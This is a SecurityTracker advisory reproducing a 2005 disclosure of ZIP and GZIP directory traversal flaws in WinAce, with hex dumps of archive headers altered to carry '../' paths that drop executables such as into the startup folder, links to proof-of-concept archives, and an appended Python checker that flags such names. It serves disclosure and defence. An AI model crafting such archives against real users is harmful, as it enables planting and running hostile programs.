SecurityTracker.com
Category:  Application (Generic)  >  WinAce
Vendors:  winace.com
WinAce ZIP and GZIP Directory Traversal Flaw Lets Malicious Archives Create Files in Alternate Locations
SecurityTracker Alert ID:  1012795
SecurityTracker URL:  http://securitytracker.com/id?1012795
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jan 6 2005
Impact:  Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): 2.5
Description:  Rafel Ivgi reported a vulnerability in WinAce. A remote user can create a ZIP or GZIP archive that, when processed by the target user, will extract the file to an alternate location.

A user can create an archive that contains '../' directory traversal characters in the path to specify an alternate location. Then, when the target user extracts the archive using WinAce, the file will be written to the alternate location.

Impact:  A remote user can create a malicious ZIP or GZIP archive that, when processed by the target user, will extract the file to an alternate location.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.winace.com/
Cause:  Access control error, Input validation error
Underlying OS:  Windows (Any)
Reported By:  "Rafel Ivgi, The-Insider" <theinsider@012.net.il>
Message History:   None.


 Source Message Contents

Date:  Thu, 06 Jan 2005 10:21:39 +0200
From:  "Rafel Ivgi, The-Insider" <theinsider@012.net.il>
Subject:  WinAce & WinHKI - ZIP File Directory Transversal

 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application:    WinAce, WinHKI
Vendors:        http://www.webtoolmaster.com
Versions:       1.4d
Platforms:      Windows
Bug:            ZIP File Directory Transversal
Exploitation:   Local (extract file)
Date:           24 Dec 2004
Author:         Rafel Ivgi, The-Insider
E-Mail:         the_insider@mail.com
Website:        http://theinsider.deep-ice.com
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
1) Introduction
2) Bugs
3) The Code
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
===============
1) Introduction
===============
 
WinHKI is a file archiver which supports: BH, CAB, HKI, JAR, LHA, TAR, GZ
compressions.
WinAce is a file archiver which supports: CAB, JAR, ZIP, RAR, TAR, GZ,
TAR.GZ, LZA, LHA compressions.
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
======
2) Bug
======
 
This is a normal ZIP compressed file header
 
00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..
00000010 F209 3C2F 0F00 C8EE 0F00 0700 0000 7370 ..</..........sp
00000020 352E 6578 65EC 5A7F 5454 577E 7F33 0C30 5.exe.Z.TTW~.3.0
00000030 C0C0 1B94 8926 6A32 2AAE D9FC 206E 2628 .....&j2*... n&(
00000040 2018 1186 4044 7D3A E40D 4940 4304 7CCC  ...@D}:..I@C.|.
 
In the following code, we can see how easy it is to change the path
to anywhere we want, including the all users start up folder.
I just overwrote the original long file name with /../../sp5.exe
 
00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..
00000010 F209 3C2F 0F00 C8EE 0F00 1000 0000 7662 ..</..........vb
00000020 2F2E 2E2F 2E2E 2F73 7035 2E65 7865 EC5A /../../sp5.exe.Z
00000030 7F54 5457 7E7F 330C 30C0 C01B 9489 266A .TTW~.3.0.....&j
00000040 322A AED9 FC20 6E26 2820 1811 8640 447D 2*... n&( ...@D}
 
All we need to do is ZIP compress (using winzip, winrar, winace)
a file with a long name/path and change the path specified inside the file
to whatever we want using any hex editor such as HexWorkshop; just add
anything to the filename.
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
===========
3) The Code
===========
 
An online proof of concept can be found at:
http://theinsider.web1000.com/WINACE-WINHKI ZIP TRANSVERSAL.zip
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
 
"Scripts and Codes will make me D.O.S , but they will never HACK me."
 
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application:    WinAce
Vendors:        http://www.webtoolmaster.com
Versions:       1.4d
Platforms:      Windows
Bug:            GZIP File Directory Transversal
Exploitation:   Local (extract file)
Date:           24 Dec 2004
Author:         Rafel Ivgi, The-Insider
E-Mail:         the_insider@mail.com
Website:        http://theinsider.deep-ice.com
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
1) Introduction
2) Bugs
3) The Code
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
===============
1) Introduction
===============
 
WinAce is a file archiver which supports: CAB, JAR, ZIP, RAR, TAR, GZ,
TAR.GZ, LZA, LHA compressions.
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
======
2) Bug
======
 
This is a normal GZIP compressed file header
 
00000000 1F8B 0808 DC89 9641 0000 7769 6E33 322D .......A..win32-
00000010 7368 656C 6C63 6F64 652E 7064 6600 BCBC shellcode.pdf...
00000020 073C 95FF FB3F 5E66 227B 671C 2487 749C .<...?^f"{g.$.t.
00000030 7D8E 5956 F626 23C9 96BD B790 BD77 F6C8 }.YV.&#......w..
00000040 2622 2264 9411 2111 45F6 5656 4684 28FF &""d..!.E.VVF.(.
 
 
In the following code, we can see how easy it is to change the path
to anywhere we want, including the all users start up folder.
I just overwrote the original long file name with /../../sp5.exe
 
00000000 1F8B 0808 CE7D A441 0000 2E2E 2F2E 2E2F .....}.A..../../
00000010 2E2E 2F2E 2E2F 2E2E 2F72 6166 692E 6578 ../../../rafi.ex
00000020 6500 B329 4E2E CA2C 2849 B34B CC49 2D2A e..)N..,(I.K.I-*
00000030 D1D0 B4D1 8708 D8F1 7201 0045 5910 EA1B ........r..EY...
00000040 0000 00                                 ...
 
All we need to do is GZIP compress (using winace)
a file with a long name/path and change the path specified inside the file
to whatever we want using any hex editor such as HexWorkshop; just add
anything to the filename.
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
===========
3) The Code
===========
 
An online proof of concept can be found at:
http://theinsider.deep-ice.com/winace gz file transversal.gz
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
 
"Scripts and Codes will make me D.O.S , but they will never HACK me."
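
A pre-extraction check for the stored-name fields shown in the hex dumps above, as an added example that is not part of the original advisory or of WinAce: it reads the file name from a ZIP local file header and from a gzip header and flags names that could resolve outside the destination folder. The function names and the rejection rule (any `..` component, a leading slash, or a colon) are assumptions of this example; the sample bytes are constructed from the leading bytes of the dumps in the message.

```python
import struct

# Constructed samples: the leading bytes of the headers printed in the advisory.
ZIP_NORMAL = bytes.fromhex(
    "504B0304140002000800CC810C2FB78FF2093C2F0F00C8EE0F0007000000"
    "7370352E657865")
ZIP_MODIFIED = bytes.fromhex(
    "504B0304140002000800CC810C2FB78FF2093C2F0F00C8EE0F0010000000"
    "76622F2E2E2F2E2E2F7370352E657865")
GZIP_MODIFIED = bytes.fromhex(
    "1F8B0808CE7DA4410000"
    "2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F726166692E65786500")

def zip_entry_name(buf):
    """File name from a ZIP local file header (length at offset 26, name at 30)."""
    if len(buf) < 30 or buf[:4] != b"PK\x03\x04":
        raise ValueError("not a ZIP local file header")
    (name_len,) = struct.unpack_from("<H", buf, 26)
    if len(buf) < 30 + name_len:
        raise ValueError("truncated file name")
    return buf[30:30 + name_len].decode("cp437")

def gzip_member_name(buf):
    """Original file name from a gzip header, or None when FNAME is not set."""
    if len(buf) < 10 or buf[:3] != b"\x1f\x8b\x08":
        raise ValueError("not a gzip/deflate member")
    flags, pos = buf[3], 10
    if flags & 0x04:                      # FEXTRA: skip XLEN and the extra field
        pos += 2 + struct.unpack_from("<H", buf, pos)[0]
    if not flags & 0x08:                  # FNAME bit clear: no stored name
        return None
    return buf[pos:buf.index(b"\x00", pos)].decode("latin-1")

def is_unsafe_name(name):
    """True if extracting `name` could land outside the destination folder."""
    parts = name.replace("\\", "/").split("/")
    return name.startswith(("/", "\\")) or ":" in name or ".." in parts

def audit(buf):
    """Return (stored_name, unsafe) for a ZIP local header or a gzip header."""
    name = zip_entry_name(buf) if buf[:2] == b"PK" else gzip_member_name(buf)
    return name, name is not None and is_unsafe_name(name)

if __name__ == "__main__":
    for label, sample in (("zip", ZIP_NORMAL), ("zip", ZIP_MODIFIED),
                          ("gzip", GZIP_MODIFIED)):
        print(label, *audit(sample))
```

An extractor that applies such a check should reject or rename the flagged entry before any file is created, and should additionally confirm that the resolved output path stays under the chosen destination directory.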
 



Copyright 2004, SecurityGlobal.net LLC